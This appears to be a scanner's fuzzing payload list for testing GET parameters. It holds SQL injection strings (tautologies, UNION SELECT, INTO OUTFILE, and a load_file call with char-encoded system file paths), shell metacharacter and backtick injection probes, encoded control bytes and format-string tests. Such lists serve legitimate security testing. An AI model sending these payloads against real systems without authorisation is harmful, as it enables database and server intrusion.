## this file contains tests for parameter manipulation ## mainly for GET requests (which means URI-encoding is possible) ## ## let's start with SQL injections ' " \ \ -- /* # REM ; ) char(39) chr(39) 11+AA X 1169 1169 1 or 6911=6911 A' or 6911=6911 6911(char(39)) 1 into outfile 'tstfil' 1 into outfile "tstfil" 1 or load_file(char(47,101,116,99,47,104,111,115,116,115)) 6911 union select 6911 6911 union select 6911 -- 6911 union select 6911 # 6911 union select 6911 /* 6911 union select 6911 6911 union select 6911 -- 6911 union select 6911 # 6911 union select 6911 /* 6911; select 6900+11 from dual; 6911; select 6900+11; ## we should cover MSSQL-specific tasks from here ## metacharacters, URI-encoded 6911%00 ;6911 |6911 !6911 &6911 &&6911 6911%04 %0a6911 %0d6911 %1b6911 6911%08%08%08%08 6911%7f%7f%7f%7f ~ `6911` %606911%60 ## simple overflow 6911 %s%x%s%x %25s%25x%25s%25x ## Unicode things